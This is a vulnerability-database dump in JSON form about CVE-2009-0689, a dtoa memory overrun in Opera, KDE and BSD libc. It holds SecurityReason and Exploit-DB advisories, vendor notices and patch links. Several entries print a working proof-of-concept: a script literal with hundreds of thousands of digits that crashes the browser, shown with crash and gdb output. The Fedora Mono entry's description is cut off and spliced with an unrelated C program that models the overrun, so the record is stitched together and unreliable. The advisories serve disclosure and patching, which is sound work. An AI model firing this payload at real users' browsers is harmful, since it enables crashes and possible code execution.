Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strt
odI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D\r\nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB\r\n=JY6k\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10185/"}, {"lastseen": "2016-02-03T19:01:45", "description": "Opera Web Browser 10.01 'dtoa()' Remote Code Execution Vulnerability. CVE-2009-0689. Remote exploits for multiple platform", "published": "2009-11-20T00:00:00", "type": "exploitdb", "title": "Opera Web Browser 10.01 - 'dtoa' Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-20T00:00:00", "id": "EDB-ID:33363", "href": "https://www.exploit-db.com/exploits/33363/", "sourceData": "source: http://www.securityfocus.com/bid/37078/info\r\n\r\nOpera Web Browser is prone to a remote code-execution vulnerability.\r\n\r\nSuccessful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.\r\n\r\nNOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.\r\n\r\nThis issue affects Opera 10.01; other versions may also be affected. 
\r\n\r\n\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33363/"}, {"lastseen": "2016-02-03T19:01:54", "description": "KDE 4.3.3 KDELibs 'dtoa()' Remote Code Execution Vulnerability. CVE-2009-0689. Remote exploit for linux platform", "published": "2009-11-20T00:00:00", "type": "exploitdb", "title": "KDE 4.3.3 KDELibs 'dtoa' Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-20T00:00:00", "id": "EDB-ID:33364", "href": "https://www.exploit-db.com/exploits/33364/", "sourceData": "source: http://www.securityfocus.com/bid/37080/info\r\n\r\nKDE is prone to a remote code-execution vulnerability that affects KDELibs.\r\n\r\nSuccessful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.\r\n\r\nNOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.\r\n\r\nThis issue affects KDE KDELibs 4.3.3; other versions may also be affected.\r\n\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33364/"}, {"lastseen": "2016-02-01T12:00:29", "description": "Opera 10.01 Remote Array Overrun. CVE-2009-0689. 
Dos exploit for bsd platform", "published": "2009-11-19T00:00:00", "type": "exploitdb", "title": "Opera 10.01 - Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EDB-ID:10187", "href": "https://www.exploit-db.com/exploits/10187/", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/223\r\n\r\n[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - Opera 10.01\r\n- - Opera 10.10 Beta\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/73\r\n\r\n\r\n- --- 0.Description ---\r\nOpera is a Web browser and Internet suite developed by the Opera\r\nSoftware company. The browser handles common Internet-related tasks such\r\nas displaying Web sites, sending and receiving e-mail messages, managing\r\ncontacts, IRC online chatting, downloading files via BitTorrent, and\r\nreading Web feeds. Opera is offered free of charge for personal\r\ncomputers and mobile phones.\r\n\r\n\r\n- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exists in the dtoa implementation. Opera has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. It is the same\r\nissue as SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut the fix for SREASONRES:20090625 used by OpenBSD was not good.\r\nMore information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create a float of any length, which will overwrite memory.\r\nKmax is defined as 15. 
Functions in dtoa don't check the Kmax limit, and it\r\nis possible to reach element 16 or higher of the freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we open this PoC in Opera, Opera will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nOPERA-CRASHLOG V1 desktop 10.01 1844 windows\r\nOpera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)\r\n\r\nRegisters:\r\nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC\r\nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202\r\nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000\r\nFPU stack:\r\nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800\r\n3FC78000000000000000 10000000000100000000 0BBE0000000000040000\r\n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F\r\n\r\n127# gdb -q opera opera.core\r\n...\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x2960307b in ?? ()\r\n...\r\n(gdb) i r\r\neax 0x71c71c71 1908874353\r\necx 0x2aa03be4 715144164\r\nedx 0x0 0\r\nebx 0x296177f8 694253560\r\nesp 0xbfbfb650 0xbfbfb650\r\nebp 0xbfbfb698 0xbfbfb698\r\nesi 0x2962d000 694341632\r\nedi 0x0 0\r\neip 0x2960307b 0x2960307b\r\n...\r\n(gdb) x/100x ($esi)-90\r\n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7\r\n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at\r\naddress 0x2962cffe\r\n...\r\n\r\n\r\n- --- 3. 
SecurityReason Note ---\r\n\r\nOfficially, SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that it would inform all\r\nvendors about this issue; however, they did not do it. Even greater\r\nconfusion was caused by the new CVE number \"CVE-2009-1563\". Secunia informed\r\nthat this vulnerability had only been detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products (KDE, Chrome)\r\nand is based on \"CVE-2009-0689\". After some time the Mozilla Foundation\r\nSecurity Advisory\r\n(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)\r\nwas updated with the note:\r\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\r\nThis fact (a new CVE number for the Firefox vulnerability) and the PoC in\r\nJavaScript (from Secunia) forced us to officially notify all other\r\nvendors. We publish all the individual advisories to formally show all\r\nvulnerable software and to avoid a wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\n\r\n- --- 4. 
Fix ---\r\nOpera fix:\r\nThe vulnerability was fixed in the latest release candidate, Opera RC3:\r\nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe\r\nShortly we can expect the final version of Opera with the fix.\r\n\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/l
ibc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4esACgkQpiCeOKaYa9bOkQCcDLKKqvSyE1ZJZebhBBiow8tV\r\nXqQAnR79bagErDfzJ3TV/MlLgrWXsGD7\r\n=/IkD\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10187/"}], "opera": [{"lastseen": "2016-09-04T11:14:57", "bulletinFamily": "software", "cvelist": ["CVE-2009-0689"], "description": "Passing very long strings through the string to number conversion using JavaScript in Opera may result in heap buffer overflows. This also affects the dtoa routine, and was reported in CVE-2009-0689. In most cases Opera will just freeze or terminate, but in some cases this could lead to a crash which could be used to execute code. To inject code, additional techniques will have to be employed.", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "OPERA:942", "href": "http://www.opera.com/security/advisory/942", "title": "Heap buffer overflow in string to number conversion", "type": "opera", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "The Mono runtime implements a JIT engine for the ECMA CLI virtual machine (as well as a byte code interpreter, the class loader, the garbage collector, threading system and metadata access libraries. 
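The three SecurityReason advisories above (K-Meleon, SeaMonkey, Opera) and Opera's own advisory all describe one mechanism: dtoa's Bigint allocator caches freed blocks in a freelist indexed by a size class k, the array has Kmax + 1 = 16 slots, and a long enough digit string makes the parser request size class 16 or more. The block below is an added example written for this page. It is not the advisories' PoC and not David Gay's dtoa.c; it keeps only the shape of Balloc()/Bfree() and the sizing loop of s2b() (x = (nd + 8) / 9 words, k = smallest k with 1 << k >= x). Everything else is this example's own: the names s2b_k, alloc_new, freelist_len, balloc_unchecked/bfree_unchecked and balloc_checked/bfree_checked, the simplified Bigint layout, and the omission of the real code's private memory pool and locking. The checked pair follows the fix that the NetBSD/OpenBSD and Mozilla patches introduced: a size class above Kmax never touches the freelist.

```c
/* Added example for CVE-2009-0689 (not the advisories' PoC, not dtoa.c):
 * a model of dtoa's Bigint freelist with the unchecked pre-fix Balloc/Bfree
 * shape beside the bounded post-fix one, plus the s2b() loop that maps a
 * digit count to the freelist index k. Names ending in _unchecked/_checked,
 * alloc_new, freelist_len and s2b_k are this example's own; the real code's
 * private memory pool and locking are left out. */
#include <stdio.h>
#include <stdlib.h>

#define Kmax 15                    /* dtoa.c: static Bigint *freelist[Kmax+1]; */
typedef struct Bigint {
    struct Bigint *next;
    int k, maxwds;                 /* size class k: maxwds == 1 << k words */
    int sign, wds;
    unsigned int x[1];             /* 1 << k words are actually allocated */
} Bigint;
static Bigint *freelist[Kmax + 1]; /* valid indices 0..15 */

/* dtoa's s2b(): nd decimal digits start out as x = (nd + 8) / 9 words,
 * and k is the smallest size class with (1 << k) >= x. */
int s2b_k(long nd)
{
    long x = (nd + 8) / 9, y;
    int k;
    for (k = 0, y = 1; x > y; y <<= 1, k++)
        ;
    return k;
}

static Bigint *alloc_new(int k)
{
    int x = 1 << k;
    Bigint *rv = malloc(sizeof(Bigint) + (size_t)(x - 1) * sizeof(unsigned int));
    if (rv == NULL) { perror("malloc"); exit(EXIT_FAILURE); }
    rv->next = NULL;
    rv->k = k;
    rv->maxwds = x;
    rv->sign = rv->wds = 0;
    return rv;
}

/* Pre-fix shape: k is trusted as an index. For k = 16 this reads
 * freelist[16], one past the array, and bfree_unchecked() writes there. */
Bigint *balloc_unchecked(int k)
{
    Bigint *rv = freelist[k];
    if (rv != NULL) {
        freelist[k] = rv->next;
        rv->sign = rv->wds = 0;
        return rv;
    }
    return alloc_new(k);
}

void bfree_unchecked(Bigint *v)
{
    if (v == NULL) return;
    v->next = freelist[v->k];      /* out-of-bounds read when v->k > Kmax */
    freelist[v->k] = v;            /* out-of-bounds write when v->k > Kmax */
}

/* Post-fix shape: a size class above Kmax never touches the freelist. */
Bigint *balloc_checked(int k)
{
    Bigint *rv;
    if (k <= Kmax && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;
        rv->sign = rv->wds = 0;
        return rv;
    }
    return alloc_new(k);
}

void bfree_checked(Bigint *v)
{
    if (v == NULL) return;
    if (v->k > Kmax) { free(v); return; }   /* too big to cache: release it */
    v->next = freelist[v->k];
    freelist[v->k] = v;
}

/* Number of cached blocks in slot k; 0 for a slot that does not exist. */
int freelist_len(int k)
{
    int n = 0;
    if (k < 0 || k > Kmax) return 0;
    for (Bigint *p = freelist[k]; p != NULL; p = p->next) n++;
    return n;
}

int main(void)
{
    /* a short literal, the last count that fits slot 15, one more, both PoCs */
    long lens[] = {1, 294912, 294913, 296450, 299999};
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        int k = s2b_k(lens[i]);
        printf("%6ld digits -> Balloc(%2d)%s\n", lens[i], k,
               k > Kmax ? "  past freelist[Kmax]" : "");
    }
    bfree_checked(balloc_checked(s2b_k(296450)));  /* freed, never cached */
    return 0;
}
```

Build with cc -std=c99 and run. s2b_k() reports that the 296450-digit and 299999-digit PoC literals both land on k = 16, the first index past freelist[Kmax], which is what the advisories' "16<= elements of freelist array" refers to; 294912 digits is the largest count that still fits slot 15 under this sizing rule. The unchecked pair is kept only for side-by-side comparison: calling it with k = 16 reads and writes past the array, so only the checked pair is ever driven with an out-of-range size class here.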
", "modified": "2015-12-29T22:26:22", "published": "2015-12-29T22:26:22", "id": "FEDORA:98D276087D46", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: mono-4.0.5-2.fc23", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:16", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "[3.5.4-25.0.1.el5_4.1]\n- Remove Version branding\n- Maximum rpm trademark logos removed (pics/crystalsvg/*-mime-rpm*) in tarball\n[3.5.4-25.1]\n- bump release\n[3.5.4-22.2]\n- Resolves: #539716,\n CVE-2009-0689, kdelibs remote array overrun ", "edition": 4, "modified": "2009-11-24T00:00:00", "published": "2009-11-24T00:00:00", "id": "ELSA-2009-1601", "href": "http://linux.oracle.com/errata/ELSA-2009-1601.html", "title": "kdelibs security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:12:06", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1998-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nFebruary 17, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : kdelibs\nVulnerability : buffer overflow\nProblem type : local(remote)\nDebian-specific: no\nCVE Id(s) : CVE-2009-0689\n\nMaksymilian Arciemowicz discovered a buffer overflow in the internal \nstring routines of the KDE core libraries, which could lead to the \nexecution of arbitrary code.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 4:3.5.10.dfsg.1-0lenny4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4:3.5.10.dfsg.1-3.\n\nWe recommend that you upgrade your kdelibs packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the 
file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-0lenny4.dsc\n Size/MD5 checksum: 2245 d0ec82902906597bc47d5033ba82a546\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.5.10.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 18639393 4bcfee29b0f939415791f5032a72e7b0\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-0lenny4.diff.gz\n Size/MD5 checksum: 409534 9d3508a67c82971b2fab757172ddfcd9\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-data_3.5.10.dfsg.1-0lenny4_all.deb\n Size/MD5 checksum: 8698880 a93e01cfe79111bd513209880aabb48a\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-doc_3.5.10.dfsg.1-0lenny4_all.deb\n Size/MD5 checksum: 26411552 00bd0960371d80dfa174b4aaf351a551\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-0lenny4_all.deb\n Size/MD5 checksum: 30238 037ad749ea0182c797f16c1dd281265e\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-0lenny4_alpha.deb\n Size/MD5 checksum: 1454014 14d233f2f53832ac2a28f75cfdd03130\n http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-0lenny4_alpha.deb\n Size/MD5 checksum: 11645354 55fed46d40bdce28aae67cf985ec401c\n 
